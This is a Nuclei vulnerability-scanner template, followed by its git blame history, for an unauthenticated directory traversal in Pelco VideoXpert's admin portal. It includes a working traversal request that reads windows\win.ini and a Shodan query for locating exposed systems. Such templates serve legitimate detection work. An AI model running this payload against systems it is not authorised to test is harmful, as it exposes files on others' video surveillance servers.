nuclei-templates/vulnerabilities/videoxpert-lfi.yaml

id: videoxpert-lfi

info:
  name: Schneider Electric Pelco VideoXpert Core Admin Portal - Directory Traversal
  author: 0x_akoko
  severity: high
  description: Pelco VideoXpert suffers from a directory traversal vulnerability. Exploiting this issue will allow an unauthenticated attacker to view arbitrary files within the context of the web server.
  reference:
    - https://packetstormsecurity.com/files/143317/Schneider-Electric-Pelco-VideoXpert-Core-Admin-Portal-Directory-Traversal.html
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5419.php
  metadata:
    shodan-query: title:"VideoXpert"
  tags: schneider,pelco,packetstorm,lfi,videoxpert

requests:
  - method: GET
    path:
      - '{{BaseURL}}/portal//..\\\..\\\..\\\..\\\windows\win.ini'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'bit app support'
          - 'fonts'
          - 'extensions'
        condition: and

      - type: status
        status:
          - 200
Update and rename schneider-electric-pelco-videoxpert-core-admin-portal-lfi.yaml to vulnerabilities/videoxpert-lfi.yaml 2022-09-12 08:33:36 +00:00			`id: videoxpert-lfi`
Create schneider-electric-pelco-videoxpert-core-admin-portal-lfi.yaml 2022-09-10 10:33:14 +00:00
			`info:`
			`name: Schneider Electric Pelco VideoXpert Core Admin Portal - Directory Traversal`
			`author: 0x_akoko`
			`severity: high`
			`description: Pelco VideoXpert suffers from a directory traversal vulnerability. Exploiting this issue will allow an unauthenticated attacker to view arbitrary files within the context of the web server.`
Update and rename schneider-electric-pelco-videoxpert-core-admin-portal-lfi.yaml to vulnerabilities/videoxpert-lfi.yaml 2022-09-12 08:33:36 +00:00			`reference:`
			`- https://packetstormsecurity.com/files/143317/Schneider-Electric-Pelco-VideoXpert-Core-Admin-Portal-Directory-Traversal.html`
			`- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5419.php`
			`metadata:`
			`shodan-query: title:"VideoXpert"`
Auto Generated CVE annotations [Mon Sep 12 11:34:28 UTC 2022] :robot: 2022-09-12 11:34:28 +00:00			`tags: schneider,pelco,packetstorm,lfi,videoxpert`
Create schneider-electric-pelco-videoxpert-core-admin-portal-lfi.yaml 2022-09-10 10:33:14 +00:00
			`requests:`
			`- method: GET`
			`path:`
Update schneider-electric-pelco-videoxpert-core-admin-portal-lfi.yaml 2022-09-12 08:28:44 +00:00			`- '{{BaseURL}}/portal//..\\\..\\\..\\\..\\\windows\win.ini'`
Create schneider-electric-pelco-videoxpert-core-admin-portal-lfi.yaml 2022-09-10 10:33:14 +00:00
Update videoxpert-lfi.yaml 2022-09-12 09:50:52 +00:00			`matchers-condition: and`
Create schneider-electric-pelco-videoxpert-core-admin-portal-lfi.yaml 2022-09-10 10:33:14 +00:00			`matchers:`
			`- type: word`
Update videoxpert-lfi.yaml 2022-09-12 09:50:52 +00:00			`part: body`
Create schneider-electric-pelco-videoxpert-core-admin-portal-lfi.yaml 2022-09-10 10:33:14 +00:00			`words:`
Update schneider-electric-pelco-videoxpert-core-admin-portal-lfi.yaml 2022-09-12 08:28:44 +00:00			`- 'bit app support'`
			`- 'fonts'`
			`- 'extensions'`
Create schneider-electric-pelco-videoxpert-core-admin-portal-lfi.yaml 2022-09-10 10:33:14 +00:00			`condition: and`
Update videoxpert-lfi.yaml 2022-09-12 09:50:52 +00:00
			`- type: status`
			`status:`
			`- 200`